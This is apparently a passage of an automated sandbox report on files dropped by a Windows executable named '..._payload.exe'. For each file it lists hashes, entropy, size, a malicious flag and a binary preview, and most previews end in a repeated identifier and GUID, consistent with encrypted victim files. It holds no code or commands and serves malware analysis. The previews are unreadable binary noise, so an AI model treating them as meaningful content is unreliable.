                                                                                                Preview:{.. S....$.V...t"r6.9.A2J.J.5,.........q..A.W..J...~.U...........5.@KI.ql..7.(...yQ.;..nM.:u.{.L....M..e=....1.(..ov......w......+....G.).:.......V..q-.[..p.s..z.#a.|.........b..L%.s......q..w8..o.P..4.p.z.GX.[.\s.x...1...?:.J.).'..i..@...5...s...S.9.....O.'.I...m~.ny..a.y.....E.xkV.x....5ge.j^..&.E......~=J.~.a~o.Nz..3....\........|.....Z.@"Vi->.Y.Q...\JG...@..L.o>.t.a..q.?....v.....rO'.}.C .M..@%...<.....BI.....t.*..!l..7.c......L..+./.(.fA.J...y........I.......!....:Q.4.6....%..x...:.]..z.q.O........v"uz\......Z..C....$.ic......Q}.<G..}.s........"PzB....EL....<C......wi%{.}.p.h3u.y..{ku..y/R...[1.E.....+.....04w.4..../.S.}.M...h..M.Q.(+.$".5P%RvV=O.`..../..2.>D.,......~..!...h~Z...m.....}..*..d...I...0fl.`.C....?.......VD_y.[=d.2..~....5..^.....He..'. `.j._.5Sh...#Am.q>...N..kt......oV.E..S..t._...1..G]....:g..Si\?.....4...5..S...)bv..K.....\....W.qC!.~n#]...e......)`..... N...C..;Y6S.....1..-..|.-.u[...0=....Y...w;\......
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):965
                                                                                                Entropy (8bit):7.767580623245908
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:ZtB9XA2WRN+DF1MAOv9ShinpSTo8Bw5NZ4qoxvx3bD:ZtB1INE/hinpSToQwerLD
                                                                                                MD5:3742C2ABEC7800072851E7BF5A1D0EF8
                                                                                                SHA1:63A31E25C8C81700F5CE2B7378CA674B8ECEED0D
                                                                                                SHA-256:B19D9D8DF1CEF97409F63B00840F76CC79DD7CE6F239F071BCA258E04305B93A
                                                                                                SHA-512:AEB73016659E37FD1B2477FFAD23D4465B25DA3768AA80B83BE61CB2492FA8E7E452C9C3EB8F0F2C7FB519D678D9D67D5AEF7F8E745F9651187132AD4BE62595
                                                                                                Malicious:false
                                                                                                Preview:{.. ....X.%...W..j.rO.1D....z!.x.*qus7.G..h..0^....K.x.A.P=...._U$J......z.....6.6<.%.....y.5. F..F.O2.R^Z..`Z....Aw3..p.h..w..........(4.G...#.k..$.Hm.O.M..v5..V.....>...K...;.n.yB|..Aq|..h..^"p<.F.Q.@.5Q..+P..f..zK...O.<U......D%....?..,.....s...E..x..l.W^.:..3.U.Us`..-... +.G.....<N........lz.G..k.-....b;..}..y.<.v{1.\.S..*!iF....1s*......5<..].."..6....S.XQ.+....3.=S.4w... ....$....rV..:^.1.,...cA..N.B...&..ub...%._....{fu....y.a.O.@..=.s[.}.|\6.....X..<..TT...*G.UhM...l.u .._1W........)..v.......+'H-..M....x.......'.4..9..].2"....P....J.C!.`7.g.:.a...P..._....k.4...d]....A..c....D+Gs.m..?1...+..5.W....Y.6......g...7......N].G..>L...P]3...8+%...w..B.~#..h8..b..7(.}".R.ZU.+.4..C...P.X-.p......d........*..........$.x..J.:$.h^.7..u..'~IU%....`..H.....2..d....<g........:..N..=p2..+V?j..M.J.Jk.t....].j...}J.z.V....3.....'..pb...."..N-..BUcuB8PRg0LNi380axIJs5BS8nCUdeo9U88L2Lt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1054
                                                                                                Entropy (8bit):7.815101650625053
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:o8+JqUX92fY5lyQjN/l1vwqxsXqcqHlUzt4IBN9e8+4x3bD:n+JtYY5lJhwqu6fHgt4I39NLD
                                                                                                MD5:4456E62F7875A8F384C4222FAF81BE1E
                                                                                                SHA1:F4D02295002D6F7B4177CA8629882979FDB4636F
                                                                                                SHA-256:615B0A89BC018A955829099449951193BA744184AA034BE26960F13FAE83AC20
                                                                                                SHA-512:18410F71EA182E353EEA1C3A73763BFF2BDDCF46A43A2C279E10B93E3A098F46344F75545C5A33CBAB2E25A60D95D572BB1970D86D1929E273AAFCAC0A05A157
                                                                                                Malicious:false
                                                                                                Preview:{.. z.0E'..-.u.X/U.......6....y..j#...31..{.l.qK..W.!"C..............IRK.MYO..t.o{@.\....E.GB.{ .....x..&J.:s...096...G..)aZ..K....?0.C2.@.....:.}.O.=yA<..<...Q$+../L`.d.i...@....W.D..P.`S..1..*8.~R<o......<".wWD..V.'.._...&..B.6.;....a$..L.tN.....+....V.k.. ...n.m....W..hp*..$Q*X5..h.?........f.%v.......`..>..".#?...H..:...f76.d.G.J7....PO&... ..\9..,.^%.>....xGrzd.vm.-[4.......@..y...-.5CX...'....!..*..E.}HTc..x:.....'...KS.@.38...n..b.p..A..'..w.......>.tj...yXEF1...1......%..!`...!.G.NB.4....t.......u......].FUc\x...:..s.O........_:.p.z.U..q....b..8.5b3V..a.|il..Y.51:."..N#......rCN...s.U]|.JZ_..=.$..........G]s{........2...h......"f`.KP...a....P.TNfS.......J....5..8..0..m...KJ.E..`.mZ.)|.?.Bq......-.B!...........Y...*.+.T.l....B...y.:/..8.VJ?:.....c..M..(.Q..d.\....'..j..h.e$+PP,...b..2.....-#a....'.Q......T..}z...G...Q.Z}?.......C.T5....k..Cm".U..G..h.j..d.0)0.<5KX...c....Y.7.>..`..N.:.PI....U..iG..J.BUcuB8PRg0LNi380axIJs5BS
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1029
                                                                                                Entropy (8bit):7.76083444026657
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:Vl7Gp9KhUF+JLZyIkMjrm5ud3TVpVN2FXLYeOQ7v1x3bD:ny8UFiLZkMPm5E3TV0bYeOQDLD
                                                                                                MD5:E8D4929BB7E5AECDAF279BC137B0BD43
                                                                                                SHA1:D90626D8AE8BB4B3531AB8BDC0C7B27F62E9422A
                                                                                                SHA-256:DA25DF0A9489E4982D4B7DBE483F6E202460B98A8636C3B69DD1A57B001A66A1
                                                                                                SHA-512:976E6D4777F8C84BAC130A33D8B268F44B6C7201C7256BEDBD0AF26D55018098D3C4ABAFCC00AD1C39F592ABA34CCCA29A06A9B5DAE32A79C83E5D1C484E19B7
                                                                                                Malicious:false
                                                                                                Preview:{.. K..-...,..#.....2...d.p.C.C....[..h{..#5...WO/..s.Q.-....r@..P>.N.to..e....y...<.}..?...mt.ic&U.w.X$f...@.Z..gq..XQ.H.,.D....".4H.s...cH...u.......!..v.;L.s..U[._...6...,5.1-C.5....BF..l..q.......Y.W.....S.,..+.`..K.2.v".+."....<o.>...H......Q..1x_$\.....[vr.j..<x.c.Y..o9.....E..6....+..S.WX....$n....<...#...k.93...'....,....w..4).P.>.K..b......G9.'.kZ).g......H.g....@H.g.w....'...Z.[`.|~18..6..z.....m....... ...O_..Y...U1.....n,.U.s+).N.V#,.H.z.nrE@...&.W...k...Dc...w..T.Xq.......C.O...M....Do.&.xk.l.\..y.,Q.n.+..(L..y.x...<.I..6.C...z.b..3.;..V@...\2>....x....`......j.........R.<...+.V#:.z......i.w.^.j..!....k.dkETh.*avO..xWy.....IW.0H...49$.N........3Q.vp.~.=.78...kX6.4.eF...3.fy......!d......6..x.P~.O!....-H.......?6......0....OX.%..@/W3W..X....GB.U.....(YT\7.....1...k.co.:.tnt...^S..vH..*.D.gC.....t....Q...7.!..^.-..`...uK....kA&.q..[q...".U.7...4.y..........{........TKI_..cY.\.*.-.>.~..BUcuB8PRg0LNi380axIJs5BS8nCUdeo9U88L2Lt1{36A698B9
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):929
                                                                                                Entropy (8bit):7.745417537565869
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:GxxVkiCsWSjNJHgh7jWS+KZIkjdEaS0B+X5YYh/yLT+hZdd4x3bD:GxxVkiga2qB8jdwg+XfFyLT+7daLD
                                                                                                MD5:B7E44B17D155038046C9E552A1BD2298
                                                                                                SHA1:759C6E408B8BC5AF240B1ABB081309C61ED7DA93
                                                                                                SHA-256:83811B5FDD84D0D9D4748C6A26BD4A9D66464551DF8BD3053E9DE772B9CD5A01
                                                                                                SHA-512:9B91B2CC3C9255EEB70ED028D10698FE01605722682FCFFFEBF96E106731BC725F26DA1BCC19FCF670F312230EEEEDF7B1D0EC9F6A3E20065E0210A0F2DE81F6
                                                                                                Malicious:false
                                                                                                Preview:{.. .PB...xr..x..C..Pa?>*.]...,...^w......y.%i(.`..B.\.X.2.>.y.3...._H(..l...G..@.W...dze4.A.`.Z.......O.d.D.}J..#9.....c...&..N..*...5...X...8...F[.|".o..GWX..o..t..l.P.+@.H...!"..X.u.. J.....}..~.....p..:~.#.^.....8.i..]...!.W._..a.Z.&W.G...*.3D...6x.j.....M.`...w<*l.L..Q..4.....C..8..%..;E}.CJ.*..cC.2..b...z&..d...K....t...*?.zK.......?..u![>C.z&......r.../..~.S...h....p..F.tD..KE.....1n9......~..6..>r'5}J.B....Z'.N..G?.n&..._..U_..*.....X$.C..F_......$.....I&.......qwX..3^..L....4.f.......T_.L.O....*.......L.[m.i....O..`X....HIc.........Ri.z.%.P...+.a.O...c.6F...R..(\..5........N.O..R.Z....1...!...8. {(.T.z5.k......$..(o...;.....(Es.q.......j.pjp.5.w..w..1.js."..R,.T..!.S..a...~...B.k.....HXV&t.n......r... ..k<O....`V..N.;.o@..... ~=cZ4 .....4.5..6`......_.Y>]*'..UH..Fud....".:@8G..>.BUcuB8PRg0LNi380axIJs5BS8nCUdeo9U88L2Lt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):968
                                                                                                Entropy (8bit):7.780703572315423
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:NME9lcCqmW6QXuxot3m2e4lvh04ZNRo9UISx3bD:Npl57W6Q+u1m2eaxZNhLD
                                                                                                MD5:BBDA2B43B422D3AF9E0256CF10B27A30
                                                                                                SHA1:16CF4DAE029CADB357B5DAEEFA0AB8E73D89D36E
                                                                                                SHA-256:E6AAA7F018819F1CA9D99BE30C32E3448638FC4DB12F672A4D2F0CD5E24DA47E
                                                                                                SHA-512:16090A24825E04CA11A45F5CBED4FF89895E4A16C60167EC3993F8435DCAF9F1D61E6810824241673B05EB9F2192206E787870EC54890CBA06CCF474E1977DDE
                                                                                                Malicious:false
                                                                                                Preview:{.. ...]........W.....atl9..%.1f.56I.4O..Z.d+.sk...4..q..\yz..u....D[.n*FQ.....-.g..'.....v.t-.g.LXc.b...$.'T.<..v..@..9W&....D...4.?.T..':.pg...6...!.Z..."......J....g..;^.<)..j...s..n...Se...2.ZU;..:.......~.x...`t.......I.d*.F..+$#.X..^....K2...n....B.j*.B.[.>..*.e..[i..b..RW.....a.v....bU..EF!.?.e...86.oU..c.Hk....X.(.....f[..Ku...M..nLl.B4!... 7....'.....^v....m.Z/Q?.1q.o..S..1l.b.vZ......o..A..$.2.G>.N....p.zPctk..B...../.y.K..A......T..S..B.....R.5V....m.K.y.=.......J".v^...d.u^Q.w.t...M.`....8......K....W.@S.;,{....\... ...f...|..ujk.O...=..kf.|Y..:.p..(...x..HN~<L...fvd..v.V.3.%.A6Rt...j.O..).<1u...n#ZLsE<...O|..C.. @=.x....b..4.D]..."e...[.B.......z.J...t..t....J^H.@.....=.\.:Xa[Ig3..$....4..J\E..M.z......l.UY.C.....s.P.;..okc(I.mA...'...~ .J....>..../v.8.Z.m...O...ur....S...h.L:6.}...)N......1.(06.[.*u.K...,.D..!diP.p.]....BUcuB8PRg0LNi380axIJs5BS8nCUdeo9U88L2Lt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):2713
                                                                                                Entropy (8bit):7.926522299098321
                                                                                                Encrypted:false
                                                                                                SSDEEP:48:DAorC3GMWWmuEmcqhn8GFteOY4r+gqp67synBN5KBxe2YaVE5wwqvTKoLD:DAorczdVE0dvexMnH7syBN5K7e2YaC5c
                                                                                                MD5:AB9F64EC37EF3E1C593825DC3937A4B8
                                                                                                SHA1:FCB5D7B7D85CEF292E78955E5399F0CE663080A7
                                                                                                SHA-256:DB9C89B29A7D8986C8C69214A036502A7DCB1D351239DCAEA75DBBF670C25FA8
                                                                                                SHA-512:BF308EB390CD23467564157B08A90DEFCF6842A1858F1D8A502CA6CBDBB572F616175BC6FF61A2B909DC67950E8DAC90058761CB5DF85089B995136E5BC191E9
                                                                                                Malicious:false
                                                                                                Preview:*...#}..>..#..=0....m...%..<...+=...v...YB..H.........^..4......2.,.C.*)hR.OU..r..x@....m.s+%..1.=..v{...)...U..d............:...f...-..8Mr..5:.*.L!...L....."5...B1YqZ./....S...&.i.$.. y...(.[...E.....*...3.c0".4..xT...z4.##2^..|B[....&..x.I..,.....-......pv8|...e....])L.[.saQ.&.M...H..?D.[.K..`......'.E.....t.!.~d..?.Oo0..Y_....S....Q[..*i.v....b.d._R..1..W....e .}.`.)!..E^.Hv=.F)$...}.|.q.qk6.gg;H..c\....v..^.6....J*.q ....XU.!7..M.....SeQ..ff.O.b....8..?..VUM../.!.N...n...!..._o.4....?..x...^R..s.z8.bpoL...&?.....j)......4.<...}....7..58y.B.nbz...n.W....d'(;S..h.y.'...C..v.DD......l..JF.....U.w....K...........G..XyzH......(b._o.c.I&...5<.w._I7..%.......f.d.....68.........8.t-...0...4.rsp&R].S.d.9.I....beI.......R............'rj.s.<.t....]ay..p..P..#:...k.{Npv.B.r..uY...4..6t.4.hj........."...d.......F.L8......Q....B.Z..e/7.2. ..e.f.*...}X..B0I.[ "R+E5)........0.@Y..O..C...+..|n.......^@t.qS.....H.n0..y.T..Z@!>...4z....HuS.*F...f..#
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):654
                                                                                                Entropy (8bit):7.583772221391399
                                                                                                Encrypted:false
                                                                                                SSDEEP:12:kVwA+IcHHvPL+vsAk7gKCBYp9PNX0Iju45AC6h5gJc3cii9a:TZIcHPPUVgCBGPNX0Ijux5x3bD
                                                                                                MD5:E07865D8E98667566E1E3F3D3B968BB7
                                                                                                SHA1:C56683491830F5F498BDE412A3D1E8B7F4A6F279
                                                                                                SHA-256:BEDBDBB3B109FCE52613967ACFB7AAA7C47D64DCEE4167F6092C3D356D33F96E
                                                                                                SHA-512:A3EC4681CA16D3C1B10CBE1EE16930430A6752785CC4DFB64FD157EC405D6344634CD93EE40CEDBCA4931453FFD8F6EAA6885B400CEFA746CF4BF10E19B6F9FA
                                                                                                Malicious:false
                                                                                                Preview:2023/B..l.*...^.ZA....jgb~J..............G..K.?.D.........d..}![..wY...&.k3..g..,.S'...%n.%w.@E.mKO.54..6.g..Y...z&...C......r...J.,.^v....Hs...e(u7...I.aL.".%..%,w.`.s..J..6e..9....^..=5}....n.....'...2..........g..M...#....r7._j...%....j.p....2M......w0..$e%.'tCx..p)]......m..:..Ka.3...Fu.al>DrI.t.......c...r.$...+..#.5PL.b....o..g.....,..Q.v.I.....5...F.....'..K*....^A..s.[....Z.\....?.Y*.kta.....I...5.CdE..5[.s...e.K.z......6d...i..d....U....^C.C).....!;..-E.?...yd...93n.......I.b.z.0..i..._......z..S!...@.-k...J."..q.q......3S...0(C..B.BUcuB8PRg0LNi380axIJs5BS8nCUdeo9U88L2Lt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):446
                                                                                                Entropy (8bit):7.456854918003815
                                                                                                Encrypted:false
                                                                                                SSDEEP:12:jsr0h7EqFEfuCdUh6uNckeB+ARtJ5gJc3cii9a:jOaEqFEWk3uNj0Rt/x3bD
                                                                                                MD5:C2B3555792CA0E7FF7619D2B19DCEAC8
                                                                                                SHA1:7FD80AA65C698A31CA63CDDEB7FC89ED0C2456BD
                                                                                                SHA-256:AEFB19A71EAA4E34EC2648634DDC0805614E42E4A2B108CABA6D6D4591EF12CA
                                                                                                SHA-512:BA3EA3C71B0F3B84C9A1A99CB7E63F0476C1D012BE244AE10F86C83D8D08FEDB2D06A17057C1FDFBB100C33BCC88F06DB1AB22B3279F8DDD2699C31A9ADAFAF6
                                                                                                Malicious:false
                                                                                                Preview:.On.![...O...8.....g..I.G...T..."...`..y.+.27..m...7Y^jq..\....H...m46...d6...k..z*..w..!)(.....f.. ..I.....@.WGP.......X.,hW...J..*...$.9.P......#..a...f..&\.r_L..D|..^.}...[.8......|.......Ce. .V@.a}.0.&.}...z.....?.#AJ_-k.P`...sL.000.o...@.U..V:1..dw...=.P.!...6\pZn.z..}....:.....H.._.,j..^.H.....OjD.y.N.%.3}h=..H..Nz.shz.TY..:,..kM$........BUcuB8PRg0LNi380axIJs5BS8nCUdeo9U88L2Lt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):682
                                                                                                Entropy (8bit):7.64876463891884
                                                                                                Encrypted:false
                                                                                                SSDEEP:12:kVMCCYne6mm/Mcdh9Emqt6Zv94pKdv92EOjbJGUAKSeQCm44zVSgJc3cii9a:TkmmRNEI2pGv92EWVAK1Q740Sx3bD
                                                                                                MD5:581EC1BEBBD3D5975469ADEA7DC7F9BC
                                                                                                SHA1:62A30012F47A87EFAD9BAD1990E982C46B6EBC4D
                                                                                                SHA-256:2536E632040D587F67C1F62C5CC65F0BE2E04A7ACDD6B1DC883F4B1C646914EB
                                                                                                SHA-512:73D9003B2D30C4503F9C7755255BFD410118609343193C596BCDC9EAD69BA2851EE34D9C97D46C39AB007647FB0F586CBFC8CD258DF42542E5A8630ADDAFA3C0
                                                                                                Malicious:false
                                                                                                Preview:2023/4-...e_6..z$o.....-...a.!.._&.}:..o... .O.r....:...Z...U..Q..d8"...+.......mg]...h@eD..G.....~...v...A5..{...DV.A. .r.6p!...8.5..h.,I....7.w9..!...lm...'..Y.4#.v&..........X...*.(OY.B.....H..E..C.vH}..H..<s~.F7._. ..Q.+Fdj(..p...X...lIJ$....ez.XUWM....8.,..5....a.......]G............si..?..|.4keE.........o.......w..l..uoF.......mf..D.`YZY._ ..3...u.0.m...J.gBS.@....Y"s'X...:...^.....g?$..}_..kvKP.%.......[....2w..6....?..D? >.."Jw...-..E..k|.S...<.v.u.WPB"."..jM..Q.&...Z.>......1..Rj.H..QB..K.!N^.:K.`2..*.D.M.@!,.Z..Hn.....`G...=.t.y)..Ej.{.p...e.....-...&.....^].....BUcuB8PRg0LNi380axIJs5BS8nCUdeo9U88L2Lt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):395
                                                                                                Entropy (8bit):7.3106711321244955
                                                                                                Encrypted:false
                                                                                                SSDEEP:12:Sj+VEmyoI9Kxw1cUNzVOe/HdSgJc3cii9a:a4Dy5gyfV/HdSx3bD
                                                                                                MD5:28454E9D0D6D2135D935187E684AE9CF
                                                                                                SHA1:B156BE5EF6537768AF69DE57C1FF7C9D09E0EF2D
                                                                                                SHA-256:6349D7EA028D5B22320156D8248A7CB68DD5E4929F3F9587D84F886F916AAADA
                                                                                                SHA-512:8C8C30BAF659A728A40B8F4B785E807A6EA2B07F3AA9F8C6C94068D5E7BECB6DAA3B66824AF3E1D4F56DC0208B336330F7F52B1684B56FAFD01E7D1073A70C97
                                                                                                Malicious:false
                                                                                                Preview:*...#....0.n.a".U .[......r..X..=T....7$$D..:...z.7...;%k.A..{...x..kI.$?.|..8.,...a.0.dd...+]5.c.9.....@....n..|....N.U.L.M.......1o...HZ..+....'..!x/N.;J.~...P........#..f..RN...@..2.>.dW./M;H~*.:...>-..9.D...4e..7.b.Rt.mL3......"Y.".HZ..y....r.i......`f.~).n.T..n......R....4Z....0:<TlZB..,.T.....>..BUcuB8PRg0LNi380axIJs5BS8nCUdeo9U88L2Lt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):29006
                                                                                                Entropy (8bit):7.993530381144674
                                                                                                Encrypted:true
                                                                                                SSDEEP:768:/5SscctnFYwomoHBjYb8HV6m2NoOcsT9y8FS:Is3FYwJWBUb81uNoO1BFw
                                                                                                MD5:192B64E3F3BD84B46CD16F899AD1477D
                                                                                                SHA1:B629351C3B7424E9AE0A4637CA2E3D4A962E212B
                                                                                                SHA-256:3A6B853E838F5274522EC18FA563D9ECC281B9660290BC22F6EFE184F15EB63F
                                                                                                SHA-512:D80F86DB561FBD5F4EB87E979C5D5A5129D9A3C9E3AF7098F3F51042526F4C8BBBFD5EE67F18E2D9BD39A37A8AF57DF45126B97796EC6C6BF0F1718528C77588
                                                                                                Malicious:true
                                                                                                Preview:SQLit..@............|.5..G..E....>....D.@I.]=l=..x..S.8...$..A.?.@M...H..]C....>Q.r.....y..E.....N.!.r8..`..+..|.m.xO8B.,..h...6s....(.3....*..Zr.g.'.*.l......2.\.yh..g^...Oy.\Xe.Q....b. .....J..3|...?f...!...E...:..l74..M..S.L.......VT...y..]O.iq)a.?A..0...-....b*..J.C_.8"@.?...%.cj;.......@V.*S...E4....m.. <.3 <.....L.t..=U.J.M.a.%W>R.1m`.V......_0..C.7...,..v..4....~.^.....~..e...E.y>.X.A..M..m..a.AU.9s..2..o.6.M.o..<.W.d...){.o....Er{......l...l.a.ze..g..S.....@6......vJ..J.]......E.dJ.... ,..T......T....RB.b....{.F..,P..g.....92.....C...x....=2....5...(...b..~.....7.E|5.;.;.(X....=g3...q4.R...q.L...Nn......}......+@....A...9@P.K..M.n..0..!...*<.....dxFI[.1(-u.zj:....p5KH..o..K..@L._..o..Q?0.?.......J9}.....+...R...%h.......2D6......W:.Xb.A?...%.d....~.....jy.UY.6.....+>..uA.....zF....<%...\W./...c.1-Z,xy..P..7.f..I.....+..;.aP.T.ZD.....,..u....=.Q.o}.5..2...^.=.....q.........X]<....r.;S-......w....~.. H....Vp.'<...<.B...`......l.......r
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):77068
                                                                                                Entropy (8bit):7.997343872415731
                                                                                                Encrypted:true
                                                                                                SSDEEP:1536:yU6yWN1OEvycN5x8TohEMaj5xKrv3m8Mr50fBJiOPVJ3uzUWIyg0Znpq:VvcYExPxgo+vnKb3DnbPX+UWIyvK
                                                                                                MD5:B736824E8B276C839B552AAAB283BC4C
                                                                                                SHA1:EB25725706F123C2F80536007598BC8481D744AA
                                                                                                SHA-256:7C8AF52195A81A5D6E9AEC4B15DBA18DC6763210EB43C968B63D704C9416CE1A
                                                                                                SHA-512:9AEEF05C7675E730D4716536672426BDC213F6C6AA63F53518ADDD7D39310D0CC6E48C64E9567B04A8153E7665280E1AB33AA7D3866FD51CCF50E4757EE6ED8E
                                                                                                Malicious:true
                                                                                                Preview:A..r...+..<......4ZH.n..fM...[b...j......V'....m.B@.b.b.e.<-.._....UcyQ*.2.n.av+..+..e.:l..............tv....W.z..%....+d.^.....\....R.h.Z?.D...=..q...@8..M.[B...t..W..q_g. \.m|...G.I,,.k..i..L...../...!......v .u.?5...../.......[0G...s.9e.q&...Z.0....1$...x.(<`\C.xl_..7-pwRbX...........s"[bnO..9F....;=..z@L...y..K.W.....g.4gh1jl[../W..c..$hg...Yi.T.<egq<....8..<.5.....W.!n..RHZ..%o..B5.f..u.P)5In1y.....-.'..nh.%..Vm..?...>.g....1.|..] ..Zq4m.z.rb8..}......Aca..$.[..^L[......O...S..$ra..jL.h.>.{...9"z.W7r.48....`...[x...H&...*.....4F.6c")...U..,w.{...Q.m..H..S.Jx....J.z...4....D.......A....bcX....0Z...[.wAr.\..>......W........i.U.8.W..@.i].E.J[B.C.............]..C......Ki...X.'.*....k...o+...'.......'B.o-...c..%....M.x:.....{7..|..,.)..J./.4]b.?...<.Kq2lW2M......-.H &.W.....K....|4.!.....W...rJ.....Zh..gP.'.........$...*xn.M.p|J.*.?.5....:5..<.*...F.r/.$\..x{?.!.|..* *N....A!$.e<%........2.g.B.......A...x.]|.d.i[.n.t,........B.g..PID..
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):654
                                                                                                Entropy (8bit):7.63580290435648
                                                                                                Encrypted:false
                                                                                                SSDEEP:12:k0mbYYf6/qlnxJmyKYkM7YyufrlMhLlTEhLv3ogJc3cii9a:sOexJmypkMZsehwT4x3bD
                                                                                                MD5:2FEF254184E1C5CC698A8D6BF9BBE4FF
                                                                                                SHA1:E42C3838DA183FAB565EFC233B7EFF36175ABDFF
                                                                                                SHA-256:26EBC231FEBF4C1CEBCD75B049199B941F833AF94BF0A705CB8C0D7A7757CE57
                                                                                                SHA-512:2101CDF8DAC0AA715708B5F692A2B3E995D3849DDDA7A8B1B72A4B3F9E65FF4FC4E08CA6627BB5406719ECD6AFC66FE2864C7B321460DD2946AC4B2160E5B97F
                                                                                                Malicious:false
                                                                                                Preview:2023/...,.........].vN.....av..#.~.C.?|.Zm...^........h.......B.....G#Z.)t..G.......*6X5.B.!~Q..}..+..m.....tX,H..s.Q'.a....T...B6.@Y....n.i.}.C.`.;..h.S)W.r....6.r`uv.$v...`<e.....iJ$^.[t.R.>..V....:../D...j....+ ,c.[.i..=+............q.Kc.......z.!.7_.....IC.....D.6...S....b.R3X_^.Z."@.Ar.4.L....e.V..S}~DkN|.Rv....X..)..~&G^..V.6sLYM.c:Gc..W..I...5....8.....b.N..Y.UH:~.H......KU.....F..@.B..(.k..1A....3Z.%...'..F.VI....E..H./...v.m..^.......{.b.3E.........Y...A...s.c.?...e......G.Ml..(E...Gg......O@d&...:..1...I9T.t_..A.C...n...Om3..#BUcuB8PRg0LNi380axIJs5BS8nCUdeo9U88L2Lt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):49486
                                                                                                Entropy (8bit):7.996462066702139
                                                                                                Encrypted:true
                                                                                                SSDEEP:1536:2zPfoXll0yvDBVqKnEyd8Bs2ZdeQdmt1Gx4Sh:2zPQXlrX3EyKs2reQdu1GaM
                                                                                                MD5:DB7394D1EA0BEDD10A149488EFDB094C
                                                                                                SHA1:22BAC1DEC423A19F2C126DFB841C0A95123A5F41
                                                                                                SHA-256:BD52DF52B6AEA23A914409F37A09327B22E26C271FF1B95F638BE0D827B8DFB5
                                                                                                SHA-512:CB761184289FE023469C06069476EE5AA62D51F8B24855BFB95D14FC97BDFFBDE719E7E6FAC389AE790957A88F4FB3281B9ED6CB97182429142475A6EC4C13E8
                                                                                                Malicious:true
                                                                                                Preview:SQLitW...i..b9.cB..@..**vW......?.6..............._..^..L../.d.H%.*....LG7....9.....s{BT.0t}..5.0cJ!.:rB.H\Z.V.v.. ..H.sWp..r.-.(.3z..N....1q}u.t...}.F.?.[...l........W...`..l.......k.g3.....9`..,D...QG..#.j...).z..5.g..(..4..4.Kb........Sv-.Yz..t3`.@*?.JqM7<...]5.5a.^....i>.....(~.?..;......u""...q...8..=..A.F.B..~.g:X.w^]..Y.5.9/...P..[.k`9'5.....0......E...7/.It.. V+..H.y.-.$J..,...w.Z.Lq..q.9X.y.)`..>.A.9.?`...^......k;@...e.)NQ..VE.o...{.'.P?S....S.......!WES..P.|6ng.>..FC..Z.(4.6B.n../m.q..y....A..U..5]..O.p[.U(.......>2..e0...qDrk....=....Ug.P..zj[..J.....M<.i.........3u..rCj.Ep..%.....wt....C....;....S.).r6.5D..%.Q8k2j....?..m...*....z.+.......P..1..,..:.m"M =.UM...L.[......-p..)....v.g4.).........'....:!.........H.$2Bd.?.....Q.......|kS....u...E...<P.9,...B...q.........@7...+.......yL...K8.V.T...gw......b.....UB......b.hS...%...i5.....A.t..`.6.....\.I.....Bc..V..."...... T_5...'..**|.].P}.B.......v.....:..Q..u.N..X.....U)V.*
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
